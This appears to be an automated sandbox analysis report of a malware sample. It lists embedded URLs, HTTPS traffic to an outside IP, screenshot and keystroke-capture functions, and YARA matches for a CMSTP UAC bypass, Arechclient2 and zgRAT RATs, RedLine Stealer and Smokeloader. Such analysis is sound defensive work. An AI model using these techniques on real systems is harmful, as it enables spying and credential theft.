Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.comrent
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719579000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u2ts.0.exe, 00000002.00000003.2074203635.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3264269793.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/DHJKKEGI
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u2ts.0.exe, 00000002.00000003.2223377481.000000002E260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 185.93.1.243:443 -> 192.168.2.5:49726 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_0020C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

3_2_0020C8B0

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_6C72A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

3_2_6C72A5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2424325171.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2424005663.0000000001CE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Detected potential crypto function

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367BB15	0_2_0367BB15
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367C3F8	0_2_0367C3F8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367CA63	0_2_0367CA63
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03697AE7	0_2_03697AE7
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367C131	0_2_0367C131
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_036789C8	0_2_036789C8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368B989	0_2_0368B989
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03682607	0_2_03682607
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367F6A8	0_2_0367F6A8
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367C6B3	0_2_0367C6B3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0367BE87	0_2_0367BE87
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD06BE0	2_2_6BD06BE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA0BA0	2_2_6BCA0BA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC08BAC	2_2_6BC08BAC
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC7EA80	2_2_6BC7EA80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC7CA70	2_2_6BC7CA70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCAEA00	2_2_6BCAEA00
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB8A30	2_2_6BCB8A30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD1C9E0	2_2_6BD1C9E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC349F0	2_2_6BC349F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC909A0	2_2_6BC909A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBA9A0	2_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC09B0	2_2_6BCC09B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC38960	2_2_6BC38960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC56900	2_2_6BC56900
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCEC8C0	2_2_6BCEC8C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD068E0	2_2_6BD068E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD4840	2_2_6BCD4840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC50820	2_2_6BC50820
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC8A820	2_2_6BC8A820
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC00FE0	2_2_6BC00FE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDEFF0	2_2_6BCDEFF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD48FB0	2_2_6BD48FB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0EFB0	2_2_6BC0EFB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC6EF40	2_2_6BC6EF40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC2F70	2_2_6BCC2F70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC06F10	2_2_6BC06F10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40F20	2_2_6BD40F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0AEC0	2_2_6BC0AEC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA0EC0	2_2_6BCA0EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC86E90	2_2_6BC86E90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9EE70	2_2_6BC9EE70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE0E20	2_2_6BCE0E20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD8CDC0	2_2_6BD8CDC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC96D90	2_2_6BC96D90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC04DB0	2_2_6BC04DB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD2AD50	2_2_6BD2AD50
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCED70	2_2_6BCCED70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD88D20	2_2_6BD88D20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5ECD0	2_2_6BC5ECD0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBFECC0	2_2_6BBFECC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0AC60	2_2_6BC0AC60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC6C00	2_2_6BCC6C00
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDAC30	2_2_6BCDAC30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC543E0	2_2_6BC543E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC323A0	2_2_6BC323A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5E3B0	2_2_6BC5E3B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC08340	2_2_6BC08340
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD42370	2_2_6BD42370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC02370	2_2_6BC02370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD1C360	2_2_6BD1C360
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC96370	2_2_6BC96370
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC72320	2_2_6BC72320
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD862C0	2_2_6BD862C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD22A0	2_2_6BCD22A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCE2B0	2_2_6BCCE2B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC98250	2_2_6BC98250
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC88260	2_2_6BC88260
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCA210	2_2_6BCCA210
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD8220	2_2_6BCD8220
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC001E0	2_2_6BC001E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC68140	2_2_6BC68140
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC76130	2_2_6BC76130
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE4130	2_2_6BCE4130
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF8090	2_2_6BBF8090
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC100B0	2_2_6BC100B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDC0B0	2_2_6BCDC0B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC4E070	2_2_6BC4E070
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCC000	2_2_6BCCC000
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC8010	2_2_6BCC8010
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC2A7D0	2_2_6BC2A7D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC80700	2_2_6BC80700
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC246D0	2_2_6BC246D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5E6E0	2_2_6BC5E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9E6E0	2_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5C650	2_2_6BC5C650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF45B0	2_2_6BBF45B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCCA5E0	2_2_6BCCA5E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC8E5F0	2_2_6BC8E5F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD48550	2_2_6BD48550
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC58540	2_2_6BC58540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD04540	2_2_6BD04540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC62560	2_2_6BC62560
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA0570	2_2_6BCA0570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC464D0	2_2_6BC464D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9A4D0	2_2_6BC9A4D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD2A480	2_2_6BD2A480
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC18460	2_2_6BC18460
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC64420	2_2_6BC64420
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC8A430	2_2_6BC8A430
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC47BF0	2_2_6BC47BF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF1B80	2_2_6BBF1B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE5B90	2_2_6BCE5B90
